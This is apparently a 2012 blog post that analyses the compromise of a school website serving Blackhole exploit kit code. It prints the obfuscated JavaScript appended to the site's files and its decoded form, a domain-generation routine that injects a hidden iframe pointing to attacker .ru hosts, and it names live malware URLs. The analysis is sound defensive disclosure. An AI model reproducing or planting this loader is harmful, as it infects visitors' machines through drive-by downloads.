DAV Gandhinagar's website compromised, serving Malware
WARNING: Viewing this page, might trigger an alarm in your antivirus software, due to the nature of code present in this page. However there is no live code here, exploit code here are just for explanation purpose.
DAV Public School Gandhinagar's official previous official website http://www.davgn.org got compromised earlier this week by some unknown hackers and was found to be running the infamous Black-hole exploit kit to possibly serve trojans.
UPDATE :DAVGN have changed their domain to http://www.davgandhinagar.com (Current Official Website, which looks clean as of3rd Nov 2012)
So as soon as you visit the school website, your system will become infected with malwares and other similar threats. Below I'll discuss the infection happened to site.
Technical Analysis of the attack
I was reported by Himanshu, an eleventh standard student of DAVGN that his browser is showing the "Reported Attack site" page, instead of the regular school homepage when he tried to visit the school website.
When I visited the site I saw the same thing . See below
So out of curiosity, I ran a Sucuri SiteCheck scan to quickly check which files of the site were infected. The scan completed in a few seconds and I was displayed with the result. See below
So, you can see clearly three JavaScript files were infected with some malicious code.Now for analysis I downloaded all of them.
I found that all of the files were initially clean but some rogue code was appended at the end of every file. See below
The appended rogue JavaScript code was looking similar to the ones used in BlackHole exploit kit's code. The above pictures clearly shows that the rogue code is highly obfuscated.
Complete Snippet of Obfuscated Rogue JavaScript Code:
/*km0ae9gr6m*/
try {
prototype % 2;
} catch (asd) {
x = 2;
}
try {
q = document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" + ((f) ? "e" + "n" + "t" : "")]("p");
q.appendChild(q + "");
} catch (fwbewe) {
i = 0;
try {
prototype * 5;
} catch (z) {
fr = "fromChar";
f = [510, 702, 550, 594,
--------------SNIP--------------------------
192, 160, 192, 160, 750, 50,
];
v = "eva";
}
if (v) e = window[v + "l"];
w = f;
s = [];
r = String;
z = ((e) ? "Code" : "");
for (; 1776 - 5 + 5 > i; i += 1) {
j = i;
if (e) s = s + r[fr + ((e) ? "Code" : 12)]((w[j] / (5 + e("j%2"))));
}
if (f) e(s);
}
/*qhk6sa6g1c*/
When the above code runs it decodes itself to :
function nextRandomNumber() {
var hi = this.seed / this.Q;
var lo = this.seed % this.Q;
var test = this.A * lo - this.R * hi;
if (test > 0) {
this.seed = test;
} else {
this.seed = test + this.M;
}
return (this.seed * this.oneOverM);
}
function RandomNumberGenerator(unix) {
var d = new Date(unix * 1000);
var s = d.getHours() > 12 ? 1 : 0;
this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
this.A = 48271;
this.M = 2147483647;
this.Q = this.M / this.A;
this.R = this.M % this.A;
this.oneOverM = 1.0 / this.M;
this.next = nextRandomNumber;
return this;
}
function createRandomNumber(r, Min, Max) {
return Math.round((Max - Min) * r.next() + Min);
}
function generatePseudoRandomString(unix, length, zone) {
var rand = new RandomNumberGenerator(unix);
var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'];
var str = '';
for (var i = 0; i < length; i++) {
str += letters[createRandomNumber(rand, 0, letters.length - 1)];
}
return str + '.' + zone;
}
setTimeout(function () {
try {
if (typeof iframeWasCreated == "undefined") {
iframeWasCreated = true;
var unix = Math.round(+new Date() / 1000);
var domainName = generatePseudoRandomString(unix, 16, 'ru');
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=botnet2");
ifrm.style.width = "0px";
ifrm.style.height = "0px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
}
} catch (e) {}
}, 500);
This code silently creates a hidden iframe tag which points to a pseudo random domain generated by the above code. The domain generation is based on current month and current date of the system with some other parameters involved.
While analysing the code, random domain generated was http://clkujrjqvexvbmoi.ru . The code creates the iframe tag with src attribute of iframe pointing to http://clkujrjqvexvbmoi.ru/runforestrun?sid=botnet2
When I tried to contact that URL, I was redirected to http://includtraf.ru/in.cgi?7 which is known to host malware but at the time of analysis the domain was down, therefore further analysis wasn't done. See snaps below.
HTTP 302 Redirection by the malware hosting domain
http://includtraf.ru/in.cgi?7 Reported Infected By Google SafeBrowsing
Even though the domain is offline, it posses a major threat because nobody knows when that domain will again start functioning.
How davgn.org was hacked ?
Good question, first of all www.davgn.org runs on PleskPanel which is a site administration software suite. Recently, a zero-day exploit for PleskPanel started floating around the Internet and the exploit code is being sold for around $8000 in the dark-markets.The exploit code can compromise an entire server running PleskPanel.
So the scenario might have been like some hacker(s) noticed that the site was running a vulnerable version of PleskPanel. Then using the zero-day exploit they compromised the server and infected all the Javascript files with Blackhole exploit code to launch attacks.
Further Reading : http://www.infoworld.com/d/security/parallels-investigates-claims-of-plesk-vulnerability-following-wave-of-website-hacks-197730
That's all from my analysis, thanks for reading!
- Prakhar
